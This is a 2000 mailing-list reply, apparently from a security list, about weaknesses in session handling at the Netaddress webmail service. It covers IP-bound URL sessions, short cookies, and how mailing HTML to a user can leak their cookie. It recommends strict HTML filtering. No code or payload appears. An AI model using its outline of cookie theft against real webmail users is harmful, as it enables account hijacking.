Re: Netaddress and amexmail

[marcs () ZNEP COM (Marc Slemko)]

On Thu, 27 Apr 2000, Blue Boar wrote:

> Fabio Pietrosanti wrote:
> > Does you know the existance of cookie ? :)
>
> I think that's the answer in this case.
>
> Though, the question is valid.  There do exist web services
> that put everything needed in the URL, so saving the URL
> will work.  Some also have a timeout, so the same URL no longer
> works 5 minutes later, which could explain a friend not
> being able to use the URL because time has passed.
>
> Those are really dumb, especially for web e-mail.  If someone
> mails you a link, and you click on it, guess what shows up
> in the site's log as a referer...

In this case, if you look at the options given at login you see that
netaddress gives you the choice of using cookies or not.

By default, they don't.  That has a few implications.  First, anyone who
can access the service from the same IP address that you can is able to do
nasty things.  Suppose you use a proxy with world (ie. to anyone with
access to that machine) readable logs.  You are toast against anyone who
can read them and use the proxy machine.  Anyone behind one of those evil
bogus "transparent caching" so-called HTTP proxies has the problem of
"sharing" an IP too.

Second, this assumption doesn't always work right because you can't make
the assumption that one IP address == one user.  And that works both ways;
one IP address could be more than one user, one user could have more than
one IP during the same session, or both.

After you logout or after a timeout, the session is no longer valid.

If you use cookies, then the IP address limitation is no longer there.
The cookie they use is a 6-character alphabetic key.  However, that is
still not very secure due to so-called "cross site scripting" (although in
this case it is a lot more straightfoward; mail someone something that
gets them to send you their cookie, no "cross site" anything).  Cookies
are not secure and will never be secure.  Period.  I can guarantee you
that with almost any web-based mail sevice, someone can steal your cookies
for that service.  Netaddress is no exception.  Trying to display
arbitrary HTML while filtering "unsafe" HTML is really an unsolved, and
unsolvable, task.  The only way a service can avoid this is by only
explicitly allowing through a very limited subset of HTML.  This limits
functionality quite a bit, but there is no choice if security is a goal.
The very fact that Hotmail still has new problems being found every month
or so should demonstrate this; if MS can't get it right for IE, no one
else has much chance.  Hotmail is even worse though, due to its use of
Microsoft's passport system.

For Netaddress, you are probably safer, in most situations, not using
their cookie obvious since it significant decreases security for most
people.

For most people, the best of both worlds would be cookies combined with an
IP address restriction.  Not 100%, but stops any random user from
exploiting you.  Unfortunately, very few, if any, services offer that.

The other thing that webmail service should do if they don't want to do it
by default is give you the option of having it to "strict HTML filtering".
That way maybe some things won't work, but you are a lot more secure.
They could then include a "read this insecurely" link if you really think
you want to read a message without stripping/encoding any non-trivial
HTML.  This should be the default setting, but even if they don't make it
the default, at least offering it would make life better.

Disabling javascript would be a nice option, but unfortunately most web
based mail services require that you leave it enabled.  Catch-22.